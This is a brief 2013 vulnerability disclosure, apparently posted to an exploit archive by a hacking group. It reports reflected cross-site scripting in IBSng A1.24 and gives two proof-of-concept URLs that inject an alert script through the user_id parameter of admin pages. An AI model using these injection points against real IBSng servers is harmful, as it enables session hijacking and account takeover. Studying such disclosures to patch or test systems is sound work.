IBSng version A1.24 suffers from multiple cross site scripting vulnerabilities.
c155f86712960813ad819d5103a4d8242b28718aa6563eb3c8a6e0e3337f0228
-============== In The Name Of God ==============-
# Title : IBSng Version A1.24 Cross Site Scripting Vulnerability
# Author : IRaNHaCK Security Team
# Tested on : 7 , Xp , Backtrack
# Vendor : http://ibs.sourceforge.net/
# Date : 2013-08-05
# Our Website : WWW.IRaNHaCK.ORG
<------------------------------------------>
-==========<XsS>==========-
1- Http://127.0.0.1/IBSng/admin/report/realtime_web_analyzer.php?username=[Username]&user_id=<script>alert(/IRaNHaCK/)</script>
2- Http://127.0.0.1/IBSng/admin/user/change_credit.php?user_id=<script>alert(/IRaNHaCK/)</script>
<------------------------------------------>
Greetz : Mr.XpR - Secret.Walker - V30Sharp - FarbodEZRaeL - AL1R3Z4 - Mr.a!i - ZeroKilleR - Mr.FixXxer - @3is - mr.3lr0n - r0bb3r68
M.R.S.CO - Mr.Cicili - Navid Black Hat - FTA_boy - Mh0122 & All Of Our Friends
./MojiRider
./Persian Gulf For EVER